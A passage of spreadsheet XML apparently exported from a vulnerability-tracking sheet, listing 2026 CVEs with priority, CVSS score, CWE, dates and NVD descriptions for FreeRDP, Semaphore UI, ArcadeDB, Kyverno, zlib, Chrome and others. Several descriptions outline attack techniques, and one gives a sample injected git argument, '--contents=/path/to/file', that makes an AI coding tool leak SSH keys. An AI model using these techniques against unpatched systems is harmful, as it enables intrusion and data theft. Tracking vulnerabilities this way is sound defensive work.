          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.30.0, FreeRDP server-side RDSTLS in libfreerdp/core/rdstls.c accepts an attacker-supplied RDSTLS_TYPE_CAPABILITIES PDU while rdstls_server_authenticate is waiting for RDSTLS_TYPE_AUTHREQ, leaving resultCode at RDSTLS_RESULT_SUCCESS and allowing a remote unauthenticated client to bypass the RedirectionGuid, username, domain, or password checks. This issue is fixed in version 3.30.0.</t>
        </is>
      </c>
      <c r="M1663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73241</t>
        </is>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73242</t>
        </is>
      </c>
      <c r="C1664" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1664" s="5" t="inlineStr"/>
      <c r="F1664" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1664" s="5" t="inlineStr"/>
      <c r="H1664" s="5" t="inlineStr"/>
      <c r="I1664" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1664" s="5" t="inlineStr"/>
      <c r="K1664" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1664" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.30.0, FreeRDP's winpr/libwinpr/sspi/Kerberos/kerberos.c kerberos_DecryptMessage function fails to bound the peer-controlled GSS Wrap-token EC field before using it with RRC in IOV pointer offsets, allowing a malicious RDP peer to trigger out-of-bounds reads and in-place writes during CredSSP/NLA Kerberos decryption. This issue is fixed in version 3.30.0.</t>
        </is>
      </c>
      <c r="M1664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73242</t>
        </is>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73292</t>
        </is>
      </c>
      <c r="C1665" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1665" s="5" t="inlineStr"/>
      <c r="F1665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1665" s="5" t="inlineStr"/>
      <c r="H1665" s="5" t="inlineStr"/>
      <c r="I1665" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J1665" s="5" t="inlineStr"/>
      <c r="K1665" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-620</t>
        </is>
      </c>
      <c r="L1665" s="5" t="inlineStr">
        <is>
          <t>Semaphore UI is a web interface for managing DevOps tools. Prior to 2.18.21, the /api/users/{id}/password endpoint accepts a cross-site request using the authenticated user's semaphore session cookie without CSRF protection or current-password confirmation, allowing an unauthenticated attacker to change an administrator's or another user's password after user interaction. This issue is fixed in version 2.18.21.</t>
        </is>
      </c>
      <c r="M1665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73292</t>
        </is>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73541</t>
        </is>
      </c>
      <c r="C1666" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1666" s="5" t="inlineStr"/>
      <c r="F1666" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1666" s="5" t="inlineStr"/>
      <c r="H1666" s="5" t="inlineStr">
        <is>
          <t>zenhive:machine_payments_protocol</t>
        </is>
      </c>
      <c r="I1666" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1666" s="5" t="inlineStr"/>
      <c r="K1666" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1666" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling in ZenHive mpp allows an unauthenticated remote client to drain the fee-payer wallet through concurrent sponsored payments, denying service to legitimate payers once it is empty.
MPP.Methods.Tempo.FeePayerPolicy enforces its ceilings (max_gas, max_fee_per_gas, max_priority_fee_per_gas, the worst-case gas_limit * max_fee_per_gas &lt;= max_total_fee budget cap, and a validity window) against one transaction at a time, and nothing accounts for exposure across concurrent requests. reserve_hash_atomic/2 is keyed on the transaction hash, so it prevents duplicate broadcast of the same signed transaction but not N distinct sponsored transactions carrying distinct expiring nonces. Committed sponsor exposure is therefore N times max_total_fee, bounded by nothing in the library, and the default 900 second validity window lets co-signed transactions stay broadcastable and uncounted for that entire period.
This issue affects mpp: from 0.2.0 before 0.12.0.</t>
        </is>
      </c>
      <c r="M1666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73541</t>
        </is>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75842</t>
        </is>
      </c>
      <c r="C1667" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1667" s="5" t="inlineStr"/>
      <c r="F1667" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1667" s="5" t="inlineStr"/>
      <c r="H1667" s="5" t="inlineStr"/>
      <c r="I1667" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1667" s="5" t="inlineStr"/>
      <c r="K1667" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1667" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB versions before 26.8.1 contain an arbitrary file read vulnerability in the OpenCypher LOAD CSV FROM clause that allows authenticated users to read local files. Attackers with read query privileges can use the file:// protocol in LOAD CSV statements to access arbitrary files with server process privileges, exfiltrating sensitive data directly in query responses.</t>
        </is>
      </c>
      <c r="M1667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75842</t>
        </is>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75912</t>
        </is>
      </c>
      <c r="C1668" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1668" s="5" t="inlineStr"/>
      <c r="F1668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1668" s="5" t="inlineStr"/>
      <c r="H1668" s="5" t="inlineStr"/>
      <c r="I1668" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1668" s="5" t="inlineStr"/>
      <c r="K1668" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L1668" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain an argument injection vulnerability in the git_blame tool that allows attackers to read arbitrary files by injecting git options into the unvalidated rev parameter. Attackers can supply rev values like --contents=/path/to/file to exfiltrate sensitive files such as SSH keys and credentials through the tool output returned to the model.</t>
        </is>
      </c>
      <c r="M1668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75912</t>
        </is>
      </c>
    </row>
    <row r="1669">
      <c r="A1669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76225</t>
        </is>
      </c>
      <c r="C1669" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1669" s="5" t="inlineStr"/>
      <c r="F1669" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1669" s="5" t="inlineStr"/>
      <c r="H1669" s="5" t="inlineStr"/>
      <c r="I1669" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1669" s="5" t="inlineStr"/>
      <c r="K1669" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1669" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains a server-side request forgery vulnerability in the OpenCypher LOAD CSV implementation that fails to validate HTTP/HTTPS URLs. Authenticated attackers can craft LOAD CSV queries pointing to internal network addresses or cloud metadata endpoints to make the ArcadeDB server fetch and return sensitive data from restricted services.</t>
        </is>
      </c>
      <c r="M1669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76225</t>
        </is>
      </c>
    </row>
    <row r="1670">
      <c r="A1670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="C1670" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1670" s="5" t="inlineStr"/>
      <c r="F1670" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1670" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1670" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1670" s="5" t="inlineStr"/>
      <c r="K1670" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1670" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="1671">
      <c r="A1671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80469</t>
        </is>
      </c>
      <c r="C1671" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1671" s="5" t="inlineStr"/>
      <c r="F1671" s="5" t="inlineStr"/>
      <c r="G1671" s="5" t="inlineStr"/>
      <c r="H1671" s="5" t="inlineStr"/>
      <c r="I1671" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1671" s="5" t="inlineStr"/>
      <c r="K1671" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1671" s="5" t="inlineStr">
        <is>
          <t>An attacker may achieve arbitrary code execution on a target system by uploading a malicious device driver package, bypassing driver verification mechanisms, and triggering the execution of
attacker-controlled code. User interaction is required.</t>
        </is>
      </c>
      <c r="M1671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80469</t>
        </is>
      </c>
    </row>
    <row r="1672">
      <c r="A1672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="C1672" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1672" s="5" t="inlineStr"/>
      <c r="F1672" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1672" s="5" t="inlineStr"/>
      <c r="H1672" s="5" t="inlineStr"/>
      <c r="I1672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1672" s="5" t="inlineStr"/>
      <c r="K1672" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L1672" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="M1672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="1673">
      <c r="A1673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="C1673" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1673" s="5" t="inlineStr"/>
      <c r="F1673" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1673" s="5" t="inlineStr"/>
      <c r="H1673" s="5" t="inlineStr"/>
      <c r="I1673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1673" s="5" t="inlineStr"/>
      <c r="K1673" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L1673" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="M1673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="1674">
      <c r="A1674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82404</t>
        </is>
      </c>
      <c r="C1674" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1674" s="5" t="inlineStr"/>
      <c r="F1674" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1674" s="5" t="inlineStr"/>
      <c r="H1674" s="5" t="inlineStr"/>
      <c r="I1674" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1674" s="5" t="inlineStr"/>
      <c r="K1674" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1674" s="5" t="inlineStr">
        <is>
          <t>TOON is a compact, human-readable serialization of JSON data for LLM prompts. Prior to 2.3.1, decoding attacker-controlled TOON with a __proto__, constructor, or prototype key wrote through the object prototype chain instead of creating an own property, polluting Object.prototype for the runtime. In packages/toon/src/decode/expand.ts, the expandPaths: 'safe' path and insertPathSafe function made dotted keys such as a.__proto__.x the strongest vector, while plain nested objects, tabular rows, quoted keys, and streaming decode were also affected. The encoder also dropped own __proto__ properties and could invoke an inherited setter during normalization. Services that decode untrusted TOON could experience denial of service or, when a suitable downstream gadget is present, remote code execution. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="M1674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82404</t>
        </is>
      </c>
    </row>
    <row r="1675">
      <c r="A1675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82662</t>
        </is>
      </c>
      <c r="C1675" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1675" s="5" t="inlineStr"/>
      <c r="F1675" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1675" s="5" t="inlineStr"/>
      <c r="H1675" s="5" t="inlineStr"/>
      <c r="I1675" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1675" s="5" t="inlineStr"/>
      <c r="K1675" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L1675" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.8 disables TLS certificate verification in lib/fetch/index.js through rejectUnauthorized: false, allowing attackers to intercept OAuth2 token requests. Attackers in a machine-in-the-middle position can capture OAuth client secrets, refresh tokens, and access tokens transmitted over compromised HTTPS connections.</t>
        </is>
      </c>
      <c r="M1675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82662</t>
        </is>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82750</t>
        </is>
      </c>
      <c r="C1676" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1676" s="5" t="inlineStr"/>
      <c r="F1676" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1676" s="5" t="inlineStr"/>
      <c r="H1676" s="5" t="inlineStr"/>
      <c r="I1676" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1676" s="5" t="inlineStr"/>
      <c r="K1676" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1676" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for EIP-7702 account delegations of the client's choosing.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but never reads its aa_authorization_list field. Every signed delegation in that list is charged as intrinsic gas before the payment call runs, so a client attaching delegations from throwaway authority keys makes the sponsor pay for them within the default gas_limit ceiling. At the reporter's default of seven entries the sponsored cost rises from about 46,575 gas to about 1,884,087 gas. Because each entry is applied as a persistent set-code delegation, a client can also upgrade its own accounts to delegated code at the sponsor's expense.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="M1676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82750</t>
        </is>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82751</t>
        </is>
      </c>
      <c r="C1677" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1677" s="5" t="inlineStr"/>
      <c r="F1677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1677" s="5" t="inlineStr"/>
      <c r="H1677" s="5" t="inlineStr"/>
      <c r="I1677" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1677" s="5" t="inlineStr"/>
      <c r="K1677" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1677" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input in ZenHive mpp allows an unauthenticated remote client to inflate the fee-payer's gas cost per sponsored payment by a large multiplier and to have the sponsor pay for provisioning an access key on the client's own account.
When the server sponsors Tempo payments, MPP.Methods.Tempo.FeePayerPolicy.measure/3 in lib/mpp/methods/tempo/fee_payer_policy.ex bounds the gas fields, the fee budget, the validity window and the access list of the client-signed 0x76 envelope, but does not check whether the envelope carries the optional key_authorization field. A client can attach a fully signed key authorization, provisioning a new access key with token spending limits on its own account, alongside the normal payment call. The key and each limit entry are persistent storage writes billed as intrinsic gas to the sponsor, bounded only by the gas_limit ceiling. At the reporter's default of one key with three token limits the sponsored cost rises from about 46,587 gas to about 1,808,700 gas, and the client keeps a valid access key it paid nothing for.
This issue affects mpp: from 0.2.0 before 0.16.1.</t>
        </is>
      </c>
      <c r="M1677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82751</t>
        </is>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84173</t>
        </is>
      </c>
      <c r="C1678" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1678" s="5" t="inlineStr"/>
      <c r="F1678" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1678" s="5" t="inlineStr"/>
      <c r="H1678" s="5" t="inlineStr"/>
      <c r="I1678" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1678" s="5" t="inlineStr"/>
      <c r="K1678" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1678" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ankaios versions v0.5.1 through v1.0.1, the agent-side Control Interface authorizer incorrectly evaluates multi-segment allow rules whose first path segment is a wildcard. An authenticated workload with access restricted by such a rule can submit a CompleteStateRequest or UpdateStateRequest with an empty field mask. The request may then be incorrectly authorized as matching the scoped rule, allowing the workload to read the complete cluster state or replace state outside its authorized subtree. This may result in unauthorized disclosure or modification of other workloads and cluster configuration. Only a rule consisting solely of * is intended to authorize an empty mask.
Mitigation: Until an update containing the fix is installed, avoid multi-segment Control Interface allow-rule filter masks that begin with a wildcard, such as *.workloads.some_workload. Replace them with explicit paths such as desiredState.workloads.some_workload, where applicable. A filter mask consisting solely of * has different, intentionally unrestricted semantics and should only be used when full-state access is intended.</t>
        </is>
      </c>
      <c r="M1678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84173</t>
        </is>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84195</t>
        </is>
      </c>
      <c r="C1679" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1679" s="5" t="inlineStr"/>
      <c r="F1679" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1679" s="5" t="inlineStr"/>
      <c r="H1679" s="5" t="inlineStr"/>
      <c r="I1679" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1679" s="5" t="inlineStr"/>
      <c r="K1679" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1679" s="5" t="inlineStr">
        <is>
          <t>Kyverno before 1.16.4 automatically attaches the admission controller's ServiceAccount token to outbound HTTP requests in apiCall service mode without explicit authorization headers. Attackers can exfiltrate the token by directing apiCall requests to external or attacker-controlled endpoints, gaining full control over Kyverno policies and cluster resources.</t>
        </is>
      </c>
      <c r="M1679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84195</t>
        </is>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84196</t>
        </is>
      </c>
      <c r="C1680" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1680" s="5" t="inlineStr"/>
      <c r="F1680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1680" s="5" t="inlineStr"/>
      <c r="H1680" s="5" t="inlineStr"/>
      <c r="I1680" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1680" s="5" t="inlineStr"/>
      <c r="K1680" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1680" s="5" t="inlineStr">
        <is>
          <t>Kyverno before 1.18.0 contains a server-side request forgery vulnerability in apiCall.service.url that allows authenticated users to send arbitrary HTTP requests by injecting user-controlled input through variable substitution. Attackers can target internal services, cloud metadata endpoints, and loopback addresses, with response data reflected in admission error messages enabling non-blind data exfiltration.</t>
        </is>
      </c>
      <c r="M1680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84196</t>
        </is>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85048</t>
        </is>
      </c>
      <c r="C1681" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1681" s="5" t="inlineStr"/>
      <c r="F1681" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1681" s="5" t="inlineStr"/>
      <c r="H1681" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1681" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1681" s="5" t="inlineStr"/>
      <c r="K1681" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1681" s="5" t="inlineStr">
        <is>
          <t>Use after free in Compositing in Google Chrome prior to 152.0.7977.82 allowed a remote attacker who had compromised the renderer process to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85048</t>
        </is>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85091</t>
        </is>
      </c>
      <c r="C1682" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1682" s="5" t="inlineStr"/>
      <c r="F1682" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1682" s="5" t="inlineStr"/>
      <c r="H1682" s="5" t="inlineStr"/>
      <c r="I1682" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1682" s="5" t="inlineStr"/>
      <c r="K1682" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1682" s="5" t="inlineStr">
        <is>
          <t>zlib versions 1.3.1.2 through 1.3.2 contain a heap buffer overflow vulnerability in the gz_vacate() function when processing non-blocking gzwrite() operations with stale external buffer pointers. Attackers can trigger the overflow by calling gzprintf() or gzvprintf() after a write stall, causing an unchecked memmove() to write beyond the internal input buffer boundary.</t>
        </is>
      </c>
      <c r="M1682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85091</t>
        </is>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85211</t>
        </is>
      </c>
      <c r="C1683" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1683" s="5" t="inlineStr"/>
      <c r="F1683" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1683" s="5" t="inlineStr"/>
      <c r="H1683" s="5" t="inlineStr"/>
      <c r="I1683" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1683" s="5" t="inlineStr"/>
      <c r="K1683" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1683" s="5" t="inlineStr">
        <is>
          <t>Label Studio fails to apply organization filters when resolving storage URIs for tasks and projects in proxy_api.py endpoints. Attackers can access other tenants' cloud storage objects by creating a separate organization and supplying arbitrary file URIs to presign or stream bucket contents.</t>
        </is>
      </c>
